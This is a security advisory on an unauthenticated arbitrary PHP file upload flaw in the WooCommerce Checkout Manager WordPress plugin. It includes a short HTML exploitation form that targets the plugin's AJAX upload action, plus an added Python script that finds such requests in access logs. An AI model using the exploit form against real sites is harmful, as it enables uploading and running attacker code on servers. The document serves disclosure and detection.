Unrestricted file upload in WooCommerce Checkout Manager



Published: 2019-04-26
Risk: High
Patch available: NO
Number of vulnerabilities: 1
CVE-ID: N/A
CWE-ID: CWE-434
Exploitation vector: Network
Public exploit: Public exploit code for vulnerability #1 is available.
Vulnerable software
WooCommerce Checkout Manager
Web applications / Modules and components for CMS

Vendor: Visser Labs

Security Bulletin

This security bulletin contains one high risk vulnerability.

1) Arbitrary file upload

EUVDB-ID: #VU18353

Risk: High

CVSSv3.1:

CVE-ID: N/A

CWE-ID:

Exploit availability:

Description

The vulnerability allows a remote attacker to compromise the vulnerable application.

The vulnerability exists due to missing restrictions on uploading PHP files via the "/wp-admin/admin-ajax.php" URL when the action is set to "wccs_upload_file_func" and a valid "order_id" identifier is set. A remote non-authenticated attacker can upload and execute an arbitrary PHP file on the server.

Exploitation example:

<html>
<body>
<form action="http://[host]/wp-admin/admin-ajax.php?action=wccs_upload_file_func&order_id=[order ID]&name=test" method="POST" enctype="multipart/form-data">
<input type="file" name="test[1]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Mitigation

Cybersecurity Help is currently unaware of any official solution to address this vulnerability.
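
With no official fix listed, site operators can review web server access logs for requests that match the endpoint and action named in the description. The following is an added example, not part of the original bulletin or the plugin's code; it assumes Apache/nginx "combined" format access logs, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/wp-admin/admin-ajax.php"   # URL named in the bulletin
ACTION = "wccs_upload_file_func"        # AJAX action named in the bulletin

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [26/Apr/2019:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=wccs_upload_file_func&order_id=1234&name=test HTTP/1.1" 200 58 "-" "Mozilla/5.0"
198.51.100.7 - - [26/Apr/2019:10:02:10 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 120 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Apr/2019:10:03:44 +0000] "POST /wp-admin/admin-ajax.php?order_id=77&action=wccs%5Fupload%5Ffile%5Ffunc HTTP/1.1" 200 58 "-" "curl/7.64.0"
192.0.2.9 - - [26/Apr/2019:10:04:00 +0000] "GET /shop/?action=wccs_upload_file_func HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Assumption: Apache/nginx "combined" access-log layout.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_requests(log_text):
    """Return one record per request that targets the vulnerable AJAX action."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not unquote(url.path).endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes, so encoded variants of the action still match.
        params = parse_qs(url.query, keep_blank_values=True)
        if ACTION not in params.get("action", []):
            continue
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "method": m["method"],
            "status": int(m["status"]),
            "order_id": params.get("order_id", [""])[0],
        })
    return hits

if __name__ == "__main__":
    for hit in find_upload_requests(SAMPLE_LOG):
        print(hit)
```

Access logs record only the request line, so this covers the query-string form shown in the exploitation example above.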

Vulnerable software versions

WooCommerce Checkout Manager: 3.0 - 4.2.6

Fixed software versions

CPE2.3

External links

http://www.pluginvulnerabilities.com/2019/04/23/our-proactive-monitoring-caught-an-arbitrary-file-upload-vulnerability-in-woocommerce-checkout-manager/
http://medium.com/@xorloop/wordpress-security-researcher-gone-rogue-a76484ed0fc9

